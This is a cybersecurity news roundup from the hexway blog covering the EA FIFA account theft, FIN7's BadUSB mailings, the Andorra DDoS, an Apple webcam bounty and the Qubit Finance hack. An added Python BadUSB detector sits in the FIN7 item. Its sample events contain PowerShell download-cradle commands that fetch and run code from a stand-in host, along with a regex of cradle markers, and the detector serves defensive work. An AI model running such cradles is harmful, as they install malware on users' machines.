hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates
Fraudsters scammed EA tech support and stole FIFA accounts
Video game maker Electronic Arts have confirmed that hackers used social engineering techniques to trick the EA support staff into giving them FIFA accounts.
Based on screenshots posted on social media by some of the victims, the accounts were hijacked after the attackers contacted EA tech support and, pretending to be the rightful owners, requested a change of the associated email address. Although many of the scammers' requests were ignored, they kept insisting until one technical support employee neglected formal procedures and relinked the email addresses without any additional verification of the users' identity.
EA is currently investigating the incident and taking steps to return the accounts to their rightful owners. In addition, the company expanded the process of verifying account holders, and now any change of email address must be approved by the head of technical support.
FIN7 sent packages with malicious USB devices to US companies
The FIN7 cybercriminal group sent malicious USB devices to US companies to infect their computer systems with ransomware.
The packages were allegedly sent from the US Department of Health and Human Services and were accompanied by letters of advice on the topic of coronavirus infection (COVID-19) attached to USB drives. Other packages were disguised as Amazon parcels in a decorative gift box containing a fake thank you note, a fake gift card, and a USB device.
When the victim connected a USB drive to their computer, the device performed a BadUSB attack: the USB device registered itself as a keyboard and sent a series of preconfigured automatic keystrokes to the user's PC. The keystrokes launched PowerShell commands that downloaded and installed various kinds of malware. Through this, the cybercriminals gained administrative access and then moved laterally to other local systems.
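The plug-in-then-keystrokes sequence described above is something a defender can correlate for: a new HID keyboard appearing and, seconds later, a PowerShell process with a download-cradle command line. The Python below is an added example, not code from the original post or from any vendor; the event schema, the sample events and the set of cradle markers are all constructed assumptions, not a real Windows log format.

```python
# Correlate a new HID keyboard with a PowerShell download cradle typed seconds later,
# the sequence a BadUSB drop produces. Event schema and sample lines are constructed
# (hypothetical), not a real Windows log format.
import re
from datetime import datetime, timedelta

# Cradle-like command-line markers, matched case-insensitively (assumed set).
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|-enc\w*\s+[a-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden",
    re.IGNORECASE)

SAMPLE_EVENTS = [  # constructed, chronological
    {"ts": "2022-01-20T09:14:02", "type": "device_arrival", "class": "Keyboard"},
    {"ts": "2022-01-20T09:14:05", "type": "process_create", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/s')"},
    {"ts": "2022-01-20T10:30:00", "type": "process_create", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},       # benign admin use
    {"ts": "2022-01-20T11:00:00", "type": "device_arrival", "class": "Keyboard"},
    {"ts": "2022-01-20T11:45:00", "type": "process_create", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c IEX (iwr http://example.invalid/t)"},  # 45 min later
]

def _ts(e):
    return datetime.fromisoformat(e["ts"])

def badusb_alerts(events, window_s=30):
    """Return (keyboard_ts, powershell_ts, cmdline) for every PowerShell launch whose
    command line looks like a cradle and that follows a keyboard arrival by <= window_s."""
    window = timedelta(seconds=window_s)
    keyboards = [_ts(e) for e in events
                 if e["type"] == "device_arrival" and e["class"] == "Keyboard"]
    alerts = []
    for e in events:
        if e["type"] != "process_create" or "powershell" not in e["image"].lower():
            continue
        if not CRADLE.search(e["cmdline"]):
            continue  # ordinary PowerShell use right after a plug-in is not enough on its own
        t = _ts(e)
        recent = [k for k in keyboards if timedelta(0) <= t - k <= window]
        if recent:  # report the most recent keyboard arrival inside the window
            alerts.append((max(recent).isoformat(), e["ts"], e["cmdline"]))
    return alerts

if __name__ == "__main__":
    for alert in badusb_alerts(SAMPLE_EVENTS):
        print("BadUSB-like sequence:", alert)
```

With the default 30-second window only the 09:14 pair is reported; the 11:45 cradle is outside the window of the 11:00 keyboard and would need a wider window, at the cost of more false positives.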
Cyberattacks on Minecraft Tournament Left Andorra without Internet
During the Minecraft tournament called SquidCraft Games, unknown people brought down the servers of Andorra's only ISP using a DDoS attack.
The only provider of the Principality of Andorra could not withstand the load, and all residents of the European country were left without access to the Internet for half an hour.
The problem stopped only after the streamers from Team Andorra were disqualified. Most likely, the attacks were aimed specifically at Team Andorra to deprive them of their chance to win the main prize.
Apple pays record $100,000 to student for webcam vulnerabilities in iOS and macOS
Ryan Pickren discovered vulnerabilities in iPhone and Mac webcams and received a record payout of $100,500 from Apple. According to Pickren, a chain of 4 vulnerabilities (CVE-2021-30861, CVE-2021-30975, and two non-CVE issues) affects Safari and iCloud.
Exploiting the chain allows an attacker to gain full access to all of the victim's accounts, including iCloud and PayPal, as well as microphone, camera, and screen sharing permissions. The hack eventually grants full access to the entire file system of the device. This is achieved through Safari's webarchive files, which the browser uses to save local copies of websites.
To carry out an attack, an attacker has to force the victim to download such a web archive file and open it.
Apple has not commented on the bug, and it is unknown if it was used in actual attacks. The tech giant paid Pickren $100,500 as part of its vulnerability discovery bounty program.
Hackers stole $80 million from DeFi platform Qubit Finance
Qubit Finance, a DeFi platform running on Binance Smart Chain (BSC), has been hacked. According to information security and blockchain analytics company PeckShield, the attackers withdrew digital assets worth about $80 million from the project pool.
While the details of the hack are unknown, analysts noted that the hackers used an exploit of the QBridge cross-chain service, which allowed them to issue a "huge" amount of xETH tokens. These tokens were then used as collateral for an illegitimate loan on the platform.
Representatives of the project confirmed the hack and said that they are tracking the stolen funds. They also contacted the attackers and offered the “maximum bounty”. The developers are now working with security partners, including Binance representatives. Most of the platform's features are temporarily disabled.